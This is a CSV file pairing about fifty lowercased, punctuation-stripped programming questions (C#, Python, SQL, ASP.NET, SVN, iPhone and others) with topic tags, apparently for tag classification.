Id,Title,Tag
43500,is there a builtin method to compare collections in c i would like to compare the contents of a couple of collections in my equals method  i have a dictionary and an ilist  is there a builtin method to do thiseditedi want to compare two dictionaries and two ilists so i think what equality means is clear  if the two dictionaries contain the same keys mapped to the same values then theyre equal,c#
43580,how to find the mime type of a file in python lets say you want to save a bunch of files somewhere for instance in blobs lets say you want to dish these files out via a web page and have the client automatically open the correct applicationviewerassumption the browser figures out which applicationviewer to use by the mimetype contenttype header in the http responsebased on that assumption in addition to the bytes of the file you also want to save the mime typehow would you find the mime type of a file im currently on a mac but this should also work on windows does the browser add this information when posting the file to the web pageis there a neat python library for finding this information a webservice or even better a downloadable database,python
43870,how to concatenate strings of a string field in a postgresql group by query i am looking for a way to concatenate the strings of a field within a group by query so for example i have a tableid   companyid   employee1    1            anna2    1            bill3    2            carol4    2            daveand i wanted to group by companyid to get something likecompanyid   employee1            anna bill2            carol davethere is a builtin function in mysql to do this groupconcat,sql
43890,crop mp3 to first 30 seconds original questioni want to be able to generate a new fully valid mp3 file from an existing mp3 file to be used as a preview  trybeforeyoubuy style the new file should only contain the first n seconds of the tracknow i know i could just chop the stream at n seconds calculating from the bitrate and header size when delivering the file but this is a bit dirty and a real pita on a vbr track id like to be able to generate a proper mp3 fileanyone any ideasanswersboth mp3split and ffmpeg are both good solutions i chose ffmpeg as it is commonly installed on linux servers and is also easily available for windows  heres some more good command line parameters for generating previews with ffmpegt ltsecondsgt chop after specified number of secondsy force file overwriteab ltbitrategt set bitrate eg ab 96kar ltrate hzgt set sampling rate eg ar 22050 for 2205khzmapmetadata ltoutfilegtltinfilegt copy track metadata from infile to outfileinstead of setting ab and ar you can copy the original track settings as tim farley suggests withacodec copy,mp3
43920,what software to use for a multistage development environment for me a multistage environment contains environments for development testing quality assurance maybe a client review stage and finally production it should allow easy collaboration between developers project status tracking and easy deployment of the application to any stage for a specific version you can propose specific tools for specific application types but i think the question is general enough is there any software package ready to use out of the box,version-control
43940,custom aggregate functions in ms sql server how can i create a custom aggregate function in ms sql server an example would help a lot,sql-server
43960,cots workshop registration system does anyone have any experience with any cots systems for managing workshops and the associated registrations courses communications etcwe have a homebuilt perl system that is about 8 years old and is currently embedded as an iframe in a sharepoint portal site externally facing needless to say it isnt integrated into our site well looks like crap needs an overhaul lacks features etc it would be nice to find either a product we can install or a service that provides those featuresthanks,cots
43970,configuring sendmail behind a firewall im setting up a server which is on a network behind a firewall and i want programs on this computer to be able to use sendmail to send emails to any email address  we have an smtp server running on this network lets call it mailrelayexamplecom which is how were supposed to get outgoing emails through the firewallso how do i configure sendmail to send all mail through mailrelayexamplecom  googling hasnt given me the answer yet and has only revealed that sendmail configuration is extremely complex and annoying,configuration
44080,does microsoft aspnet ajax cause dom object leaks weve been using drip to try and identify why pages with updatepanels in them tend to use a lot of clientside memory  with a page with a regular postback we are seeing 0 leaks detected by drip  however when we add an update panel to the mix every single dom object that is inside of the update panel appears to leak according to dripi am not certain is drip is reliable enough to report these kinds of things  the reported leaks do seem to indicate drip is modifying the page slightly  does anyone have any experience with this  should i panic and stop using microsoft ajax  im not above doubting microsoft but it seems fishy to me that it could be this badalso if you know of a tool that is better than drip that would be helpful as well,asp.net
44100,best way to use a property to reference a keyvalue pair in a dictionary this is a fairly trivial matter but im curious to hear peoples opinions on itif i have a dictionary which im access through properties which of these formats would you prefer for the property ltsummarygt this classs firstproperty property ltsummarygtdefaultvaluemyvaluepublic string firstproperty     get         return dictionarymykey        set         dictionarymykey  value    this is probably the typical way of doing it its fairly efficient easy to understand etc the only disadvantage is with a longer or more complex key it would be possible to misspell it or change only one instance or something leading me to this ltsummarygt this classs secondproperty property ltsummarygtdefaultvaluemyvalueprivate const string dictmykey  mykeypublic string secondproperty     get         return dictionarydictmykey        set         dictionarydictmykey  value    which is marginally more complicated but seems to offer additional safety and is closer to what i would think of as the code complete solution the downside is that when you also have a   block and a defaultvalue block above the property already it starts getting a bit crowded up thereso which do you like better and why does anybody have any better ideas,.net
44190,looking for a simple javascript example that updates dom i am looking for a simple javascript example that updates domany suggestions,javascript
44220,difference between foreach and for loops over an ienumerable class in c i have been told that there is a performance difference between the following code blocksforeach entity e in entitylist and for int i0 iltentitylistcount i   entity e  entityentitylisti   wherelistltentitygt entitylisti am no clr expect but from what i can tell they should boil down to basically the same code  does anybody have concrete heck id take packed dirt evidence one way or the other,c#
44260,can net check other running programs command line parameters weve got an interesting case where we are trying to determine how different instances of our app were launched is there any way for net to be able to query another running instance and get the command line parameters passed to that instance ive not been able to find any way to do it in net so far so i thought id check here to see if anyone had done anything like this before,.net
44270,order an array like another array in c im looking for the best algorithm to take array a 0123 and make order it like array b 3102  any ideas,c#
44350,what are the best keyboard macros for programming in windows i like putting shortcuts of the form g  googlelnk in my start menu so google is two keystrokes away win gmy eight or so most frequent applications go therei also make links to my solution files i am always opening x  popular projectlnkare there any better ways to automate opening frequently used applications,keyboard
44470,how do i get the clickonce publish version to match the assemblyinfocs file version every time i publish the application in clickonce i get get it to update the revision number by one is there a way to get this change automatically to change the version number in assemblyinfocs file all our error reporting looks at the assembly version,visual-studio
44630,version control practice in my current job the supervisors practice is to only check in production ready code  most recently the project i was on involved work by 3 different developers with some file overlap  this meant manually integrating changes despite the fact that some changes took a day and then it was done  i wanted to see if this was a common practice and get suggestions on how to change this practice with the knowledge that many times my opinion means little in the grand scheme of things,version-control
44660,regex in vb6 i need to write a program that can sift through speciallyformatted text files essentially csv files with a fixed set of column types that have different delimiters for some columns  comma in most places colons in others to search for formatting errors  i figure regular expressions will be the way to gothe question  is there a good regex library for vb6thank youedit  holy crap 3 responses in under an hour  thanks a ton folks  ive heard such good things about regex buddy from jeffs postings  podcasting that i will have to take a look,regex
44760,eclipse share project by hand what actually happens to the file system when you do a subclipse share project on an eclipse project that was externally checked out from subversion  all the svn folders are already in place  i get an error when i try to share project the right way and id rather not delete and recheckout the projects from the svn  repository browser,eclipse
44780,whats the best way to implement a sql script that will grant permissions to a database role on all the user tables in a database whats the best way to implement a sql script that will grant select references insert update and delete permissions to a database role on all the user tables in a databaseideally this script could be run multiple times as new tables were added to the database sql server management studio generates scripts for individual database objects but im looking for more of a fireandforget script,sql
44940,learning cil does anybody know any good resources for learning how to program cil with indepth descriptions of commands etc i have looked around but not found anything particularly good,.net
44980,how can i programmatically determine if my workstation is locked im writing up some productivitymetrics tools for myself to help monitor my focus throughout the day recently ive noticed that i tend to get off track more than usual and feel the need to get up and go for walksdrinksetc and im concerned that im wasting too much timesince i always lock my computer when i go anywhere and i unlock it as soon as i return even if im just reading at my desk etc i was wondering how i can determine in code how long the machine is lockedim writing this in c if that helps but im open to other ideasi like the windows service idea and have accepted it for simplicity and cleanliness but unfortunately i dont think it will work for me in this particular case i wanted to run this on my workstation at work rather than home or in addition to home i suppose but its locked down pretty hard courtesy of the dod thats part of the reason im rolling my own actuallyill write it up anyway and see if it works thanks everyone,c#
45030,how to parse a string into a nullable int im wanting to parse a string into a nullable int in c  ie i want to get back either the int value of the string or null if it cant be parsedi was kind of hoping that this would workint val  stringval as intbut that wont work so the way im doing it now is ive written this extension methodpublic static int parsenullableintthis string valueif value  null  valuetrim  stringemptyreturn nullelsetryreturn intparsevaluecatchreturn nullis there a better way of doing thisedit  thanks for the tryparse suggestions i did know about that but it worked out about the same  im more interested in knowing if there is a builtin framework method that will parse directly into a nullable int,c#
45180,problems with disabling iis shutdown of idle worker process i ran into an issue with an iis web app shutting down an idle worker process  the next request would then have to reinitialize the application leading to delays  i disabled the iis shutdown of idle worker processes on the application pool to resolve this  are there any issues associated with turning this off  if the process is leaking memory i imagine it is nice to recycle the process every now and then  are there any other benefits to having this process shutdown,iis
45230,is it possible to forward ssh requests that come in over a certain port to another machine i have a small local network only one of the machines is available to the outside world this is not easily changeable id like to be able to set it up such that ssh requests that dont come in on the standard port go to another machine is this possible if so howoh and all of these machines are running either ubuntu or os x ,osx
45340,friendly urls for aspnet python frameworks always provide ways to handle urls that convey the data of the request in an elegant way like for example httpsomewhereovertherainbowcomuserid123424i want you to notice the ending path userid123424how do you do this in aspnet,asp.net
45400,source control system for single developer whats the recommended source control system for a very small team one developerprice does not matter customer would pay im working on vista32 with vs 2008 in c and later in c and with wpf setting up an extra physical server for this seems overkill to me any opinions,version-control
45470,suggest some good mvc framework in perl can you suggest some good mvc framework for perl  one i am aware of is catalystthe need is to be able to expose services on the perl infrastructure which can be called by javanet applications seamlessly,perl
45500,wacom tablet python interface if possible i want to catch pressure sensitive input from a wacom tablet in python are there any python libraries available that can do this,python
45510,how can i call a net dll from an inno setup script i want to call a function from a net dll coded in c from an inno setup scripti havemarked the register for com interop option in the project propertieschanged the comvisible setting in the assemblyinfocs fileadded these lines to the iss script  files    source ctemp1mydlldll flags dontcopy    code    function myfunction string    external myfunctionfilesmydlldll stdcall setuponlybut i still get the following error  runtime error at 10    cannot import dllcdocume1foolocals1tempislrl3etmpmydlldllwhat am i doing wrong,.net
45540,how to know whether a window with a given title is already open in tk ive writen a little python script that just pops up a message box containing the text passed on the command line i want to pop it up only when the window resulting from a previous call is not openfrom tkinter import import tkmessageboxroot  tkrootwithdraw  todo not if a window with this title existstkmessageboxshowinfokey you  joinsysargv1any idea how to check that,python
45600,a issue with the jquery dialog when using the themeroller css the demos for the jquery ui dialog all use the flora theme i wanted a customized theme so i used the themeroller to generate a css file when i used it everything seemed to be working fine but later i found that i cant control any input element contained in the dialog ie cant type into a text field cant check checkboxes further investigation revealed that this happens if i set the dialog attribute modal to true this doesnt happen when i use the flora theme here is the js filetopmenu      init function        mybuttonbindclick function            service03dlgdialogopen            somethingfocus                service03dlgdialog             autoopen false            modal true             resizable false            title my title            overlay                  opacity 05                 background black                          buttons                  ok function                      alerthi                                 cancel function                      thisdialogclose                                          close function                somethingval                        documentreadytopmenuinithere is the html that uses the flora themeltdoctype html public w3cdtd html 401en httpwwww3orgtrhtml4strictdtdgtlthtmlgtltheadgtltmeta httpequivcontenttype contenttexthtml charsetshiftjisgtlttitlegtsamplelttitlegtltscript srcjquery126minjs languagejavascriptgtltscriptgtltlink relstylesheet hrefflorafloraallcss typetextcssgtltscript srcjqueryuipersonalized152minjs languagejavascriptgtltscriptgtltscript srctopmenujs languagejavascriptgtltscriptgtltheadgtltbodygtltinput typebutton valueclick me idmybuttongtltdiv idservice03dlg classfloragtplease enter somethingltbrgtltbrgtltlabel forsomethinggtsomthingltlabelgtampnbspltinput namesomething idsomething typetext maxlength20 size24gtltdivgtltbodygtlthtmlgthere is the html that uses the downloaded themeroller themeltdoctype html public w3cdtd html 401en httpwwww3orgtrhtml4strictdtdgtlthtmlgtltheadgtltmeta httpequivcontenttype contenttexthtml charsetshiftjisgtlttitlegtsamplelttitlegtltscript srcjquery126minjs languagejavascriptgtltscriptgtltlink relstylesheet hrefjqueryuithemerollercss typetextcssgtltscript srcjqueryuipersonalized152minjs languagejavascriptgtltscriptgtltscript srctopmenujs languagejavascriptgtltscriptgtltheadgtltbodygtltinput typebutton valueclick me idmybuttongtltdiv idservice03dlg classuidialoggtplease enter somethingltbrgtltbrgtltlabel forsomethinggtsomthingltlabelgtampnbspltinput namesomething idsomething typetext maxlength20 size24gtltdivgtltbodygtlthtmlgtas you can see only the referenced css file and class names are differentanybody have a clue as to what could be wrongdavid i tried it and it doesnt seem to work neither on ff or ie i tried inline cssstylezindex5000and ive also tried it referencing an external css fileservice03dlgzindex5000but neither of these work am i missing something in what you suggestededitsolve by brostbeefsince i was originally using flora i had mistakenly assumed that i have to specify a class attribute turns out this is only true when you actually use the flora theme as in the samples if you use the customized theme specifying a class attribute causes that strange behaviour,javascript
45650,common files in visual studio solution many times i have seen visual studio solutions which have multiple projects that share source files  these common source files are usually out in a common directory and in the solution explorer their icon shows up with a link arrow in the bottom lefthowever any time i try to add a source file to the project that is outside of that projects main directory it just automatically copies it into the directory so that i no longer have  a shared copyi found that i can get around this by manually opening the project file in a text editor and modifying the path to something like commonsourcecs  but this is more of a hack then i would likeis there a setting or something i can change that will allow me to do this from within the ide,visual-studio
45950,xml editor for os x httpstackoverflowcomquestions12073whatisthebestxmleditor was a great question regarding xml editors on windows what about on os xoxygen is feature complete but its a java app and a  bit clunky on osx its also extremely expensiveanything mac native and comparable in features for less than 300 thanksandrew,xml
46030,c force form focus so i did search google and so prior to asking this question basically i have a dll that has a form compiled into it the form will be used to display information to the screen eventually it will be asynchronous and expose a lot of customization in the dll for now i just want it to display properly the problem that i am having is that i use the dll by loading it in a powershell session so when i try to display the form and get it to come to the top and have focus it has no problem with displaying over all the other apps but i cant for the life of me get it to display over the powershell window here is the code that i am currently using to try and get it to display i am sure that the majority of it wont be required once i figure it out this just represents all the things that i found via googleclass blah        dllimportuser32dll entrypoint  systemparametersinfo        public static extern bool systemparametersinfouint uiaction uint uiparam uint pvparam uint fwinini        dllimportuser32dll entrypoint  setforegroundwindow        public static extern bool setforegroundwindowintptr hwnd        dllimportuser32dll entrypoint  showwindowasync        private static extern bool showwindowasyncintptr hwnd int cmdshow        private const int wsshownormal  1    public void showmessagestring msg                messageform msgfrm  new messageform            msgfrmlblmessagetext  foo            msgfrmshowdialog            msgfrmbringtofront            msgfrmtopmost  true            msgfrmactivate            systemparametersinfouint0x2001 0 0 0x0002  0x0001            showwindowasyncmsgfrmhandle wsshownormal            setforegroundwindowmsgfrmhandle            systemparametersinfouint0x2001 200000 200000 0x0002  0x0001    as i say im sure that most of that is either not needed or even flat out wrong i just wanted to show the things that i had tried also as i mentioned i plan to have this be asynchronously displayed at some point which i suspect will wind up requiring a separate thread would splitting the form out into its own thread make it easier to cause it to get focus over the powershell session joel thanks for the info here is what i tried based on your suggestionmsgfrmshowdialogmsgfrmbringtofrontmsgfrmfocusapplicationdoeventsthe form still comes up under the powershell session ill proceed with working out the threading ive spawned threads before but never where the parent thread needed to talk to the child thread so well see how it goesthnks for all the ideas so far folksok threading it took care of the problem quarrelsome i did try both of those neither nor both together worked i am curious as to what is evil about using threading i am not using applicationrun and i have yet to have a problem i am using a mediator class that both the parent thread and the child thread have access to in that object i am using a readerwriterlock to lock one property that represents the message that i want displayed on the form that the child thread creates the parent locks the property then writes what should be displayed the child thread locks the property and reads what it should change the label on the form to the child has to do this on a polling interval i default it to 500ms which im not real happy about but i could not find an event driven way to let the child thread know that the proerty had changed so im stuck with polling,c#
46080,how do you move a file in svn im using tortoisesvn against the sourceforge svn repository id like to move a file from one folder to another in order to maintain its revision history is this possible if so how do you do itmy current strategy has been to copy the file into the new folder and check it in and then delete the file from the current folder,svn
46130,how do i group in memory lists i have a list of foo foo has properties bar and lum some foos have identical values for bar how can i use lambdalinq to group my foos by bar so i can iterate over each groupings lums,c#
46160,getting an int representation of a string i am looking for a way to create an intlong representation of an arbitrary alphanumeric string hash codes wont do it because i cant afford hash collisions ie the representation must be unique and repeatable the numeric representation will be used to perform efficient hopefully compares the creation of the numeric key will take some time but it only has to happen once whereas i need to perform vast numbers of comparisons with it  which will hopefully be much faster than comparing the raw stringsany other ideas on faster string comparison will be most appreciated too,java
46220,iphone app crashing with nsunknownkeyexception setvalueforundefinedkey im writing my first iphone app so i havent gotten around to figuring out much in the way of debuggingessentially my app displays an image and when touched plays a short soundwhen compiling and building the project in xcode everything builds successfully but when the app is run in the iphone simulator it crashesi get the following errorapplication specific informationiphone simulator 10 70 iphone os 20 5a331 terminating app due to uncaught exception nsunknownkeyexception reason ltuiview 0x34efd0gt setvalueforundefinedkey this class is not key value codingcompliant for the key kramerimagekramerimage here is the image im using for the backgroundim not sure what nsunknownkeyexception means or why the class is not key value codingcompliant for the key,iphone
